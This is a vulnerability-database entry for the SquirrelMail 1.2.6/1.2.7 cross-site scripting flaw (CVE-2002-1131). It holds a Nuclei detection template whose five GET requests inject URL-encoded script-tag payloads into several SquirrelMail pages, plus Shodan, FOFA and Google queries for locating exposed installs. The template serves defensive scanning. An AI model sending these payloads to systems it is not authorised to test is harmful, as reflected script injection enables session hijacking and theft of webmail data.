SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType

SquirrelMail 1.2.6/1.2.7 Cross-Site Scripting Vulnerability in Virtual Keyboard Plugi

Reporter	Title	Published	Views	Family All 16
CVE	CAN-2002-1131	6 Aug 202410:48	–	cve
CVE	CVE-2002-1131	24 Sep 200204:00	–	cve
Circl	CVE-2002-1131	24 Dec 202308:38	–	circl
Cvelist	CVE-2002-1131	24 Sep 200204:00	–	cvelist
Debian	[SECURITY] [DSA 191-1] New squirrelmail packages fix cross site scripting bugs	7 Nov 200216:54	–	debian
Debian	[SECURITY] [DSA 191-2] New squirrelmail packages fix problem in options page	11 Nov 200209:02	–	debian
Tenable Nessus	Debian DSA-191-1 : squirrelmail - XSS	29 Sep 200400:00	–	nessus
Gitee	Exploit for CVE-2000-0114	30 Jul 202413:29	–	gitee
EUVD	EUVD-2002-1119	7 Oct 202500:30	–	euvd
NVD	CVE-2002-1131	4 Oct 200204:00	–	nvd

Source	Link
redhat	www.redhat.com/support/errata/RHSA-2002-204.html
debian	www.debian.org/security/2002/dsa-191
sourceforge	www.sourceforge.net/project/shownotes.php
exploit-db	www.exploit-db.com/exploits/21811

id: CVE-2002-1131

info:
  name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
  author: dhiyaneshDk,s4e-io
  severity: high
  description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
  remediation: |
    Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - http://www.redhat.com/support/errata/RHSA-2002-204.html
    - http://www.debian.org/security/2002/dsa-191
    - http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
    - https://www.exploit-db.com/exploits/21811
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2002-1131
    cwe-id: CWE-80
    epss-score: 0.25754
    epss-percentile: 0.97701
    cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: squirrelmail
    product: squirrelmail
    shodan-query:
      - http.title:"squirrelmail"
      - cpe:"cpe:2.3:a:squirrelmail:squirrelmail"
    fofa-query: title="squirrelmail"
    google-query: intitle:"squirrelmail"
  tags: cve,cve2002,edb,xss,squirrelmail,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
      - '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
      - '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
      - '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
      - '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "</script><script>alert(document.domain)</script>")'
          - 'contains(tolower(body), "squirrelmail")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450220656e5cbd0695a9a8165d3f32292748f21765712eeb9eb3c0d07a886cee863764022100a468ed8f3f4ba37a8c87997c09df2c2181f726c314ec5fc811e4169a6d7fc8dc:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

5.7Medium risk

Vulners AI Score5.7

CVSS 27.5

EPSS0.25754